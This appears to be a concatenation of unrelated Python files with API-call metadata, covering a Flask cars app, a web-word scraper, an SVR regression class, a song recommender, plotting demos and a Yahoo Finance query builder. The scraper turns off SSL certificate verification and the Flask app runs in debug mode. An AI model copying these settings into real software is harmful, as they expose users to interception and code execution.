'np.argmin', (['dist_protos'], {}), '(dist_protos)\n', (27249, 27262), True, 'import numpy as np\n'), ((38257, 38307), 'os.path.join', 'os.path.join', (['exp_folder_fold', '"""best_weights.hdf5"""'], {}), "(exp_folder_fold, 'best_weights.hdf5')\n", (38269, 38307), False, 'import os\n'), ((39304, 39367), 'os.path.join', 'os.path.join', (["params_dataset['feature_folder']", '"""mel_basis.npy"""'], {}), "(params_dataset['feature_folder'], 'mel_basis.npy')\n", (39316, 39367), False, 'import os\n'), ((7263, 7298), 'plotly.graph_objects.layout.Title', 'go.layout.Title', ([], {'text': '"""A Bar Chart"""'}), "(text='A Bar Chart')\n", (7278, 7298), True, 'import plotly.graph_objects as go\n'), ((7813, 7841), 'numpy.array', 'np.array', (['prototypes_classes'], {}), '(prototypes_classes)\n', (7821, 7841), True, 'import numpy as np\n'), ((8596, 8631), 'plotly.graph_objects.layout.Title', 'go.layout.Title', ([], {'text': '"""A Bar Chart"""'}), "(text='A Bar Chart')\n", (8611, 8631), True, 'import plotly.graph_objects as go\n'), ((18775, 18926), 'plotly.graph_objects.Scatter', 'go.Scatter', ([], {'x': 'x[j]', 'y': 'y[j]', 'text': 'classes[j]', 'name': 'self.label_list[j]', 'mode': '"""markers"""', 'marker': "{'size': size, 'symbol': 'cross', 'color': colors[j]}"}), "(x=x[j], y=y[j], text=classes[j], name=self.label_list[j], mode=\n 'markers', marker={'size': size, 'symbol': 'cross', 'color': colors[j]})\n", (18785, 18926), True, 'import plotly.graph_objects as go\n'), ((18962, 19147), 'plotly.graph_objects.Scatter', 'go.Scatter', ([], {'x': 'x_centers[j][:s]', 'y': 'y_centers[j][:s]', 'text': 'classes_centers[j][:s]', 'name': 'self.label_list[j]', 'mode': '"""markers"""', 'marker': "{'size': 6, 'color': colors[j], 'opacity': 0.7}"}), "(x=x_centers[j][:s], y=y_centers[j][:s], text=classes_centers[j][\n :s], name=self.label_list[j], mode='markers', marker={'size': 6,\n 'color': colors[j], 'opacity': 0.7})\n", (18972, 19147), True, 'import plotly.graph_objects as go\n'), ((19559, 19747), 'plotly.graph_objects.Scatter', 'go.Scatter', ([], {'x': 'x[j]', 'y': 'y[j]', 'text': 'classes[j]', 'name': 'self.label_list[j]', 'mode': '"""markers"""', 'selectedpoints': 'selectedpoints_j', 'marker': "{'size': size, 'symbol': 'cross', 'color': colors[j]}"}), "(x=x[j], y=y[j], text=classes[j], name=self.label_list[j], mode=\n 'markers', selectedpoints=selectedpoints_j, marker={'size': size,\n 'symbol': 'cross', 'color': colors[j]})\n", (19569, 19747), True, 'import plotly.graph_objects as go\n'), ((19778, 19983), 'plotly.graph_objects.Scatter', 'go.Scatter', ([], {'x': 'x_centers[j][:s]', 'y': 'y_centers[j][:s]', 'text': 'classes_centers[j][:s]', 'name': 'self.label_list[j]', 'selectedpoints': '[]', 'mode': '"""markers"""', 'marker': "{'size': 6, 'color': colors[j], 'opacity': 0.7}"}), "(x=x_centers[j][:s], y=y_centers[j][:s], text=classes_centers[j][\n :s], name=self.label_list[j], selectedpoints=[], mode='markers', marker\n ={'size': 6, 'color': colors[j], 'opacity': 0.7})\n", (19788, 19983), True, 'import plotly.graph_objects as go\n'), ((24792, 24834), 'numpy.random.randint', 'np.random.randint', (['(0)', '(255)'], {'size': '(100, 100)'}), '(0, 255, size=(100, 100))\n', (24809, 24834), True, 'import numpy as np\n'), ((14504, 14634), 'dash_html_components.Div', 'html.Div', (['[x_select]'], {'className': '"""two columns"""', 'style': "{'display': 'flex', 'align-items': 'center', 'justify-content': 'center'}"}), "([x_select], className='two columns', style={'display': 'flex',\n 'align-items': 'center', 'justify-content': 'center'})\n", (14512, 14634), True, 'import dash_html_components as html\n'), ((14647, 14777), 'dash_html_components.Div', 'html.Div', (['[y_select]'], {'className': '"""two columns"""', 'style': "{'display': 'flex', 'align-items': 'center', 'justify-content': 'center'}"}), "([y_select], className='two columns', style={'display': 'flex',\n 'align-items': 'center', 'justify-content': 'center'})\n", (14655, 14777), True, 'import dash_html_components as html\n'), ((14790, 14928), 'dash_html_components.Div', 'html.Div', (['[slider_samples]'], {'className': '"""three columns"""', 'style': "{'display': 'flex', 'align-items': 'center', 'justify-content': 'center'}"}), "([slider_samples], className='three columns', style={'display':\n 'flex', 'align-items': 'center', 'justify-content': 'center'})\n", (14798, 14928), True, 'import dash_html_components as html\n'), ((15092, 15162), 'dash_html_components.Div', 'html.Div', (['[plot2D]'], {'className': '"""nine columns"""', 'style': "{'height': '80vh'}"}), "([plot2D], className='nine columns', style={'height': '80vh'})\n", (15100, 15162), True, 'import dash_html_components as html\n'), ((15899, 15948), 'dash_html_components.Div', 'html.Div', (['[plot_weights]'], {'className': '"""six columns"""'}), "([plot_weights], className='six columns')\n", (15907, 15948), True, 'import dash_html_components as html\n'), ((22391, 22426), 'plotly.graph_objects.layout.Title', 'go.layout.Title', ([], {'text': '"""A Bar Chart"""'}), "(text='A Bar Chart')\n", (22406, 22426), True, 'import plotly.graph_objects as go\n'), ((22784, 22812), 'numpy.array', 'np.array', (['prototypes_classes'], {}), '(prototypes_classes)\n', (22792, 22812), True, 'import numpy as np\n'), ((23628, 23663), 'plotly.graph_objects.layout.Title', 'go.layout.Title', ([], {'text': '"""A Bar Chart"""'}), "(text='A Bar Chart')\n", (23643, 23663), True, 'import plotly.graph_objects as go\n'), ((27019, 27041), 'dcase_models.util.gui.encode_audio', 'encode_audio', (['data', 'sr'], {}), '(data, sr)\n', (27031, 27041), False, 'from dcase_models.util.gui import encode_audio\n'), ((27661, 27713), 'dcase_models.util.gui.encode_audio', 'encode_audio', (["proto_audio['data']", "proto_audio['sr']"], {}), "(proto_audio['data'], proto_audio['sr'])\n", (27673, 27713), False, 'from dcase_models.util.gui import encode_audio\n'), ((15198, 15207), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15205, 15207), True, 'import dash_html_components as html\n'), ((15214, 15223), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15221, 15223), True, 'import dash_html_components as html\n'), ((15238, 15247), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15245, 15247), True, 'import dash_html_components as html\n'), ((15260, 15269), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15267, 15269), True, 'import dash_html_components as html\n'), ((15282, 15291), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15289, 15291), True, 'import dash_html_components as html\n'), ((15304, 15313), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15311, 15313), True, 'import dash_html_components as html\n'), ((15356, 15365), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15363, 15365), True, 'import dash_html_components as html\n'), ((15379, 15388), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15386, 15388), True, 'import dash_html_components as html\n'), ((15399, 15408), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15406, 15408), True, 'import dash_html_components as html\n'), ((15438, 15447), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15445, 15447), True, 'import dash_html_components as html\n'), ((15522, 15531), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15529, 15531), True, 'import dash_html_components as html\n'), ((15532, 15541), 'dash_html_components.Br', 'html.Br', ([], {}), '()\n', (15539, 15541), True, 'import dash_html_components as html\n')] |
import json
from flask import Flask, Response
from flask import render_template, request
from bson.json_util import dumps
from flask.ext.pymongo import PyMongo
app = Flask( __name__,
static_folder="view",
)
app.config['MONGO_DBNAME'] = 'cars_db'
mongo = PyMongo(app)
@app.route("/")
def home():
return render_template('index.html')
@app.route("/cars")
def show_cars():
return render_template('cars.html')
@app.route("/cars.json")
def cars_json():
cars = mongo.db.cars.find()
json_response = dumps(cars, indent=2, sort_keys=True)
return Response(json_response, mimetype='application/json')
@app.route("/cars/<marque>")
def show_marque(marque):
context = {
'marque': marque,
}
return render_template('marque.html', context=context)
@app.route("/cars/<marque>/<model>", methods=['GET', 'POST', 'DELETE'])
def model(marque, model):
car = {
'marque': marque,
'model': model,
}
if request.method == 'GET':
return render_template('model.html', context=car)
if request.method == 'DELETE':
mongo.db.cars.remove({
'marque': car['marque'],
'model': car['model']}, 1)
return ('Success', 205)
if request.method == 'POST':
new_car = request.get_json()
mongo.db.cars.insert_one({
'marque': new_car['marque'],
'model': new_car['model'],
})
return ('Success', 201)
@app.route("/colophon")
def colophon():
return render_template('colophon.html')
if __name__ == "__main__":
app.run(
debug=True,
) | [
"flask.render_template",
"flask.Flask",
"flask.request.get_json",
"flask.Response",
"flask.ext.pymongo.PyMongo",
"bson.json_util.dumps"
] | [((167, 204), 'flask.Flask', 'Flask', (['__name__'], {'static_folder': '"""view"""'}), "(__name__, static_folder='view')\n", (172, 204), False, 'from flask import Flask, Response\n'), ((268, 280), 'flask.ext.pymongo.PyMongo', 'PyMongo', (['app'], {}), '(app)\n', (275, 280), False, 'from flask.ext.pymongo import PyMongo\n'), ((321, 350), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (336, 350), False, 'from flask import render_template, request\n'), ((401, 429), 'flask.render_template', 'render_template', (['"""cars.html"""'], {}), "('cars.html')\n", (416, 429), False, 'from flask import render_template, request\n'), ((525, 562), 'bson.json_util.dumps', 'dumps', (['cars'], {'indent': '(2)', 'sort_keys': '(True)'}), '(cars, indent=2, sort_keys=True)\n', (530, 562), False, 'from bson.json_util import dumps\n'), ((574, 626), 'flask.Response', 'Response', (['json_response'], {'mimetype': '"""application/json"""'}), "(json_response, mimetype='application/json')\n", (582, 626), False, 'from flask import Flask, Response\n'), ((742, 789), 'flask.render_template', 'render_template', (['"""marque.html"""'], {'context': 'context'}), "('marque.html', context=context)\n", (757, 789), False, 'from flask import render_template, request\n'), ((1503, 1535), 'flask.render_template', 'render_template', (['"""colophon.html"""'], {}), "('colophon.html')\n", (1518, 1535), False, 'from flask import render_template, request\n'), ((1005, 1047), 'flask.render_template', 'render_template', (['"""model.html"""'], {'context': 'car'}), "('model.html', context=car)\n", (1020, 1047), False, 'from flask import render_template, request\n'), ((1273, 1291), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (1289, 1291), False, 'from flask import render_template, request\n')] |
import urllib.request, urllib.parse, urllib.error
# http://www.py4e.com/code3/bs4.zip
# and unzip it in the same directory as this file
from urllib.request import urlopen
import re
from bs4 import BeautifulSoup
import ssl
import sqlite3
conn = sqlite3.connect('wiki2.sqlite')
cur = conn.cursor()
cur.executescript('''
CREATE TABLE IF NOT EXISTS dict (
word TEXT UNIQUE PRIMARY KEY
);
''')
fhand=''
comm = 0
#print(list_link)
#for link_T in list_link:
# print(link_T)
# Ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
#url = input('Enter - ')
#html = urlopen(url, context=ctx).read()
# html.parser is the HTML parser included in the standard Python 3 library.
# information on other HTML parsers is here:
# http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser
#soup = BeautifulSoup(html, "html.parser")
arr_junk =['http:','https:','/','<','>','=','1','2','3','4','5','6','7','8','9','0','\'','\"','}','{',']','[','(',')',':','-','+','!','~','|','\\','*','?',';','_','.','#','$','@','%','^','&','`']
cdummy = 0
dummy = 0
for i in range(100000):
list_link = cur.execute(''' SELECT link FROM data where flag = ?''',(1,))
for tlink in list_link:
print(tlink)
tlink1 = ''.join(tlink)
print(tlink1)
dummy = 0
try:
fhand = urllib.request.urlopen(tlink1)
dummy = 1
except:
print("Sorry Link cannot be opened!",tlink1)
cur.execute('''UPDATE data SET flag = 2 WHERE link = ?''',(tlink1,))
continue
if dummy == 1: #link extracted sucessfully
print("Extracting words in the link .... : ",tlink1)
for line in fhand:
big_junk=line.decode().strip().split(' ')
for junk in big_junk:
flag=1
for needle in arr_junk:
if needle in junk:
flag=0
continue
if ',' in junk:
com_pos = junk.find(',') # comma postion
ext_wrd = junk[:com_pos] # to extract word
else:
ext_wrd = junk
if flag==1:
#commit_Var = commit_Var + 1
if ext_wrd != '':
#print(ext_wrd)
ex_wrd_l = ext_wrd.lower()
print(ex_wrd_l)
cur.execute('''INSERT OR IGNORE INTO dict (word)
VALUES ( ? )''', ( ex_wrd_l, ) )
cur.execute('''UPDATE data SET flag = 2 WHERE link = ?''',(tlink1,))
cdummy = cdummy + 1
if cdummy % 20 == 0:
conn.commit()
conn.commit()
#print("Var comm = ",comm)
| [
"ssl.create_default_context",
"sqlite3.connect"
] | [((248, 279), 'sqlite3.connect', 'sqlite3.connect', (['"""wiki2.sqlite"""'], {}), "('wiki2.sqlite')\n", (263, 279), False, 'import sqlite3\n'), ((524, 552), 'ssl.create_default_context', 'ssl.create_default_context', ([], {}), '()\n', (550, 552), False, 'import ssl\n')] |
'''
NPSN Support Vector Regression Class
'''
import os
from joblib import dump, load
# Base model
from .base import BaseModel
# Import for SVR
from sklearn.multioutput import MultiOutputRegressor as MOR
from sklearn.metrics import mean_squared_error as sklmse
from sklearn.svm import NuSVR
# hyperopt imports
from hyperopt import STATUS_OK
from hyperopt.hp import choice, quniform, uniform
class SVR(BaseModel):
def __init__(self, *args):
self.model_nm = 'SVR'
if len(args) == 6:
super().__init__(*args)
else:
print("Empty {} initialized".format(self.model_nm))
self.loaded_model = None
self.file_ext = '.' + self.model_nm
def train_model(self, params):
'''
Input a dict, params, containing:
nu: Float, fraction of support vectors (0,1]
C: Float, penalty parameter of error (~1.0)
kernel: String, 'linear', 'poly', 'rbf', sigmoid'
degree: Int, degree of polynomial for poly
gamma: String, 'scale'/'auto' for 'rbf', 'poly', 'sigmoid'
Returns:
Dict containing info on combination
'''
kernel = params['kernel']
nu = params['nu']
C = params['C']
# Instantiate SVR
if kernel in ['linear']:
model = MOR(NuSVR(C=C, nu=nu, kernel=kernel))
elif kernel in ['rbf', 'sigmoid']:
gamma = params['gamma']
model = MOR(NuSVR(C=C, nu=nu, kernel=kernel,
gamma=gamma))
elif kernel in ['poly']:
gamma = params['gamma']
degree = params['degree']
model = MOR(NuSVR(C=C, nu=nu, kernel=kernel,
degree=degree, gamma=gamma))
# Print current combination
print('Current SVR combination: {}'.format(params))
# Flat versions of y (power/flux distribution)
y_tr_fl, y_te_fl = self.flat_y()
# Fit
model.fit(self.x_train, y_tr_fl)
# Hyperopt loss for each combination
y_predict = model.predict(self.x_test)
hyp_loss = sklmse(y_te_fl, y_predict)
self.tr_hist.update_history(params, hyp_loss, model)
return {'loss': hyp_loss, 'status': STATUS_OK}
def hpss_space(self):
hpss = choice('kernel_type', [
{
'kernel': 'linear',
'nu': uniform('nu_lin', 1e-5, 1),
'C': uniform('C_lin', 0.5, 10.0),
},
{
'kernel': 'poly',
'nu': uniform('nu_poly', 1e-5, 1),
'C': uniform('C_poly', 0.5, 10.0),
'degree': quniform('degree_poly', 2, 5, 1),
'gamma': choice('gamma_poly', ['scale', 'auto'])
},
{
'kernel': 'rbf',
'nu': uniform('nu_rbf', 1e-5, 1),
'C': uniform('C_rbf', 0.5, 10.0),
'gamma': choice('gamma_rbf', ['scale', 'auto'])
},
{
'kernel': 'sigmoid',
'nu': uniform('nu_sigmoid', 1e-5, 1),
'C': uniform('C_sigmoid', 0.5, 10.0),
'gamma': choice('gamma_sigmoid', ['scale', 'auto'])
},
])
return hpss
def gen_trials(self, doGuess=False):
return super().gen_trials()
def save_model(self):
'''
Save SVR model and DataLoader settings
'''
# Get best SVR model
model = self.tr_hist.best_model
if model is None:
raise(Exception('Model not trained.'))
pickle_dict = {
'model': model,
'data_info': self.data_info
}
# Save with joblib
prj_nm = self.data_info['prj_nm']
modelpath = os.path.join(os.getcwd(), prj_nm+self.file_ext)
dump(pickle_dict, modelpath)
def load_model(self, file_nm, inp_dict):
'''
Load file_nm
Inputs:
file_nm: String, name of saved file
inp_dict: Dict, empty containing keys to be read
Returns:
inp_dict: Dict, filled for DataLoader
'''
if file_nm[-len(self.file_ext):] != self.file_ext:
raise(Exception('Wrong file_nm {}'.format(file_nm)))
fpath = os.path.join(os.getcwd(), file_nm)
try:
loaded_dict = load(fpath)
except Exception:
print("Error loading {} model.".format(self.model_nm))
else:
self.loaded_model = loaded_dict['model']
self.data_info = loaded_dict['data_info']
print("{} loaded.".format(file_nm))
return self.data_info
def eval_model(self):
'''
Provides access to evaluate inputs.
Returns:
predict: Function, used to eval loaded model
'''
if self.loaded_model is None:
raise(Exception('Model not loaded.'))
# SVR requires reshaping output
def predict(x_in):
y_out = self.loaded_model.predict(x_in)
return self.un_flat_y(y_out)
return predict
| [
"hyperopt.hp.quniform",
"os.getcwd",
"sklearn.metrics.mean_squared_error",
"hyperopt.hp.uniform",
"hyperopt.hp.choice",
"joblib.load",
"sklearn.svm.NuSVR",
"joblib.dump"
] | [((2136, 2162), 'sklearn.metrics.mean_squared_error', 'sklmse', (['y_te_fl', 'y_predict'], {}), '(y_te_fl, y_predict)\n', (2142, 2162), True, 'from sklearn.metrics import mean_squared_error as sklmse\n'), ((3870, 3898), 'joblib.dump', 'dump', (['pickle_dict', 'modelpath'], {}), '(pickle_dict, modelpath)\n', (3874, 3898), False, 'from joblib import dump, load\n'), ((3827, 3838), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3836, 3838), False, 'import os\n'), ((4335, 4346), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (4344, 4346), False, 'import os\n'), ((4396, 4407), 'joblib.load', 'load', (['fpath'], {}), '(fpath)\n', (4400, 4407), False, 'from joblib import dump, load\n'), ((1337, 1369), 'sklearn.svm.NuSVR', 'NuSVR', ([], {'C': 'C', 'nu': 'nu', 'kernel': 'kernel'}), '(C=C, nu=nu, kernel=kernel)\n', (1342, 1369), False, 'from sklearn.svm import NuSVR\n'), ((1474, 1519), 'sklearn.svm.NuSVR', 'NuSVR', ([], {'C': 'C', 'nu': 'nu', 'kernel': 'kernel', 'gamma': 'gamma'}), '(C=C, nu=nu, kernel=kernel, gamma=gamma)\n', (1479, 1519), False, 'from sklearn.svm import NuSVR\n'), ((2418, 2445), 'hyperopt.hp.uniform', 'uniform', (['"""nu_lin"""', '(1e-05)', '(1)'], {}), "('nu_lin', 1e-05, 1)\n", (2425, 2445), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((2467, 2494), 'hyperopt.hp.uniform', 'uniform', (['"""C_lin"""', '(0.5)', '(10.0)'], {}), "('C_lin', 0.5, 10.0)\n", (2474, 2494), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((2581, 2609), 'hyperopt.hp.uniform', 'uniform', (['"""nu_poly"""', '(1e-05)', '(1)'], {}), "('nu_poly', 1e-05, 1)\n", (2588, 2609), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((2631, 2659), 'hyperopt.hp.uniform', 'uniform', (['"""C_poly"""', '(0.5)', '(10.0)'], {}), "('C_poly', 0.5, 10.0)\n", (2638, 2659), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((2687, 2719), 'hyperopt.hp.quniform', 'quniform', (['"""degree_poly"""', '(2)', '(5)', '(1)'], {}), "('degree_poly', 2, 5, 1)\n", (2695, 2719), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((2746, 2785), 'hyperopt.hp.choice', 'choice', (['"""gamma_poly"""', "['scale', 'auto']"], {}), "('gamma_poly', ['scale', 'auto'])\n", (2752, 2785), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((2870, 2897), 'hyperopt.hp.uniform', 'uniform', (['"""nu_rbf"""', '(1e-05)', '(1)'], {}), "('nu_rbf', 1e-05, 1)\n", (2877, 2897), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((2919, 2946), 'hyperopt.hp.uniform', 'uniform', (['"""C_rbf"""', '(0.5)', '(10.0)'], {}), "('C_rbf', 0.5, 10.0)\n", (2926, 2946), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((2973, 3011), 'hyperopt.hp.choice', 'choice', (['"""gamma_rbf"""', "['scale', 'auto']"], {}), "('gamma_rbf', ['scale', 'auto'])\n", (2979, 3011), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((3100, 3131), 'hyperopt.hp.uniform', 'uniform', (['"""nu_sigmoid"""', '(1e-05)', '(1)'], {}), "('nu_sigmoid', 1e-05, 1)\n", (3107, 3131), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((3153, 3184), 'hyperopt.hp.uniform', 'uniform', (['"""C_sigmoid"""', '(0.5)', '(10.0)'], {}), "('C_sigmoid', 0.5, 10.0)\n", (3160, 3184), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((3211, 3253), 'hyperopt.hp.choice', 'choice', (['"""gamma_sigmoid"""', "['scale', 'auto']"], {}), "('gamma_sigmoid', ['scale', 'auto'])\n", (3217, 3253), False, 'from hyperopt.hp import choice, quniform, uniform\n'), ((1682, 1742), 'sklearn.svm.NuSVR', 'NuSVR', ([], {'C': 'C', 'nu': 'nu', 'kernel': 'kernel', 'degree': 'degree', 'gamma': 'gamma'}), '(C=C, nu=nu, kernel=kernel, degree=degree, gamma=gamma)\n', (1687, 1742), False, 'from sklearn.svm import NuSVR\n')] |
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 22 09:00:08 2020
@author: SKD-HiTMAN
"""
import pandas as pd
import numpy as np
from sklearn.metrics.pairwise import cosine_similarity
ratings = pd.read_csv('../Dataset/MovieLens/ml-latest-small/ratings.csv')
songs = pd.read_csv('../Dataset/MovieLens/ml-latest-small/songs.csv', encoding='latin-1')
merged = pd.merge(ratings, songs, left_on='songId', right_on='songId', sort=True)
merged = merged[['userId', 'title', 'rating']]
songRatings = merged.pivot_table(index=['title'], columns=['userId'], values='rating')
# remove null value-> replace with 0
#songRatings.replace({np.nan:0}, regex=True, inplace=True)
songRatings = songRatings.fillna(0)
# cosine similarity: pairwise similarity b/w all users and song-rating dfs
item_similarity = cosine_similarity(songRatings)
# user_similarity is a numpy array--> convert to df : to be able to use pandas useful features
item_sim_df = pd.DataFrame(item_similarity, index = songRatings.index, columns = songRatings.index)
def sim_songs_to(title):
count = 1
print('Similar songs to {} are: '.format(title))
# sorts by song title and get top ten results
for item in item_sim_df.sort_values(by = title, ascending=False).index[1:11]:
print('No. {} : {}'.format(count, item))
count += 1
| [
"pandas.DataFrame",
"pandas.merge",
"sklearn.metrics.pairwise.cosine_similarity",
"pandas.read_csv"
] | [((208, 271), 'pandas.read_csv', 'pd.read_csv', (['"""../Dataset/MovieLens/ml-latest-small/ratings.csv"""'], {}), "('../Dataset/MovieLens/ml-latest-small/ratings.csv')\n", (219, 271), True, 'import pandas as pd\n'), ((281, 367), 'pandas.read_csv', 'pd.read_csv', (['"""../Dataset/MovieLens/ml-latest-small/songs.csv"""'], {'encoding': '"""latin-1"""'}), "('../Dataset/MovieLens/ml-latest-small/songs.csv', encoding=\n 'latin-1')\n", (292, 367), True, 'import pandas as pd\n'), ((375, 447), 'pandas.merge', 'pd.merge', (['ratings', 'songs'], {'left_on': '"""songId"""', 'right_on': '"""songId"""', 'sort': '(True)'}), "(ratings, songs, left_on='songId', right_on='songId', sort=True)\n", (383, 447), True, 'import pandas as pd\n'), ((820, 850), 'sklearn.metrics.pairwise.cosine_similarity', 'cosine_similarity', (['songRatings'], {}), '(songRatings)\n', (837, 850), False, 'from sklearn.metrics.pairwise import cosine_similarity\n'), ((964, 1050), 'pandas.DataFrame', 'pd.DataFrame', (['item_similarity'], {'index': 'songRatings.index', 'columns': 'songRatings.index'}), '(item_similarity, index=songRatings.index, columns=songRatings.\n index)\n', (976, 1050), True, 'import pandas as pd\n')] |
import numpy as np
import matplotlib.pyplot as plt
# documentation
# https://matplotlib.org/3.1.3/api/pyplot_summary.html
# scatter plot
x = np.random.randint(100, size=(100))
y = np.random.randint(100, size=(100))
plt.scatter(x, y, c='tab:blue', label='stuff')
plt.legend(loc=2)
# plt.show()
# line plot
x = np.array([10, 20, 30, 40, 50, 60, 70, 80, 90, 100])
y = np.array([10, 20, 30, 40, 50, 60, 70, 80, 90, 100])
plt.plot(x, y, c='tab:green', label='aaa')
plt.plot(x, y, "-o", c='tab:green', label='aaa') # plot with dots
# plt.show()
# bar chart
x = np.arange(3)
plt.bar(x, height=[1,2,3])
plt.xticks(x, ['a','b','c'])
plt.ylabel('y')
plt.xlabel('x')
# plt.show()
# subplots (pie chart and histogram)
arr_pie = np.array([40,30,70])
arr_pie_labels = ["a","b","c"]
arr_hst = np.random.normal(size=1000)
fig1, axs = plt.subplots(2)
axs[0].pie(arr_pie, labels=arr_pie_labels)
axs[0].title.set_text("pie chart")
axs[1].hist(arr_hst, bins=30)
axs[1].title.set_text("histogram")
# plt.show()
| [
"numpy.random.normal",
"matplotlib.pyplot.xticks",
"numpy.arange",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"numpy.array",
"numpy.random.randint",
"matplotlib.pyplot.bar",
"matplotlib.pyplot.scatter",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.leg... | [((145, 177), 'numpy.random.randint', 'np.random.randint', (['(100)'], {'size': '(100)'}), '(100, size=100)\n', (162, 177), True, 'import numpy as np\n'), ((184, 216), 'numpy.random.randint', 'np.random.randint', (['(100)'], {'size': '(100)'}), '(100, size=100)\n', (201, 216), True, 'import numpy as np\n'), ((219, 265), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'y'], {'c': '"""tab:blue"""', 'label': '"""stuff"""'}), "(x, y, c='tab:blue', label='stuff')\n", (230, 265), True, 'import matplotlib.pyplot as plt\n'), ((266, 283), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '(2)'}), '(loc=2)\n', (276, 283), True, 'import matplotlib.pyplot as plt\n'), ((316, 367), 'numpy.array', 'np.array', (['[10, 20, 30, 40, 50, 60, 70, 80, 90, 100]'], {}), '([10, 20, 30, 40, 50, 60, 70, 80, 90, 100])\n', (324, 367), True, 'import numpy as np\n'), ((372, 423), 'numpy.array', 'np.array', (['[10, 20, 30, 40, 50, 60, 70, 80, 90, 100]'], {}), '([10, 20, 30, 40, 50, 60, 70, 80, 90, 100])\n', (380, 423), True, 'import numpy as np\n'), ((424, 466), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y'], {'c': '"""tab:green"""', 'label': '"""aaa"""'}), "(x, y, c='tab:green', label='aaa')\n", (432, 466), True, 'import matplotlib.pyplot as plt\n'), ((467, 515), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y', '"""-o"""'], {'c': '"""tab:green"""', 'label': '"""aaa"""'}), "(x, y, '-o', c='tab:green', label='aaa')\n", (475, 515), True, 'import matplotlib.pyplot as plt\n'), ((564, 576), 'numpy.arange', 'np.arange', (['(3)'], {}), '(3)\n', (573, 576), True, 'import numpy as np\n'), ((577, 605), 'matplotlib.pyplot.bar', 'plt.bar', (['x'], {'height': '[1, 2, 3]'}), '(x, height=[1, 2, 3])\n', (584, 605), True, 'import matplotlib.pyplot as plt\n'), ((604, 634), 'matplotlib.pyplot.xticks', 'plt.xticks', (['x', "['a', 'b', 'c']"], {}), "(x, ['a', 'b', 'c'])\n", (614, 634), True, 'import matplotlib.pyplot as plt\n'), ((633, 648), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""y"""'], {}), "('y')\n", (643, 648), True, 'import matplotlib.pyplot as plt\n'), ((649, 664), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""x"""'], {}), "('x')\n", (659, 664), True, 'import matplotlib.pyplot as plt\n'), ((727, 749), 'numpy.array', 'np.array', (['[40, 30, 70]'], {}), '([40, 30, 70])\n', (735, 749), True, 'import numpy as np\n'), ((790, 817), 'numpy.random.normal', 'np.random.normal', ([], {'size': '(1000)'}), '(size=1000)\n', (806, 817), True, 'import numpy as np\n'), ((831, 846), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)'], {}), '(2)\n', (843, 846), True, 'import matplotlib.pyplot as plt\n')] |
from . import core
import io
import re
import requests
import pytz
import time
import datetime as dt
import dateutil.parser as du
import numpy as np
import pandas as pd
from typing import Tuple, Dict, List, Union, ClassVar, Any, Optional, Type
import types
class AccessModeInQuery(core.API):
# Enumeration class to list available API access modes.
NONE = 'n/a';
DOWNLOAD = 'download';
CHART = 'chart';
DEFAULT = 'download';
class EventsInQuery(core.API):
"""
Enumeration class to list the 'events' that is possible to request.
"""
NONE = '';
HISTORY = 'history';
DIVIDENDS = 'div';
SPLITS = 'split';
class Query():
"""
Class that encodes the request parameters into a query.
It provides methods to set such parameters
as well as to validate them in accordance to the Yahoo Finance API expected arguments.
"""
__events__:ClassVar[List[str]] = ["history", "split", "div"];
__chart_range__:ClassVar[List[str]] = ["1d", "5d", "1mo", "3mo", "6mo", "1y", "2y", "5y", "10y", "ytd", "max"];
__chart_interval__:ClassVar[List[str]] = ["1m", "2m", "5m", "15m", "30m", "60m", "90m", "1h", "1d", "5d", "1wk", "1mo", "3mo"];
__download_frequency__:ClassVar[List[str]] = ["1d", "1wk", "1mo"];
def __init__(self, using_api:Type[AccessModeInQuery]):
self.query:Dict[str,Optional[str]] = {};
self.__api__:AccessModeInQuery = using_api;
def __str__(self):
return "&".join([f"{param}={value}" for param, value in self.query.items() if value is not None]) if len(self.query)>0 else "";
def __len__(self):
return len(self.query);
def __bool__(self):
return True if len(self.query)>0 else False;
def SetEvents(self, events:Type[EventsInQuery]) -> None:
if not isinstance(events, EventsInQuery):
self.query['events'] = None;
raise TypeError(f"invalid type for the argument 'events'; <class 'EventsInQuery'> expected, got {type(events)}");
else:
if self.__api__ is AccessModeInQuery.CHART:
self.query['events'] = events if events not in [EventsInQuery.HISTORY, EventsInQuery.NONE] else None;
elif self.__api__ is AccessModeInQuery.DOWNLOAD:
self.query['events'] = events if events is not EventsInQuery.NONE else str(EventsInQuery.HISTORY);
else:
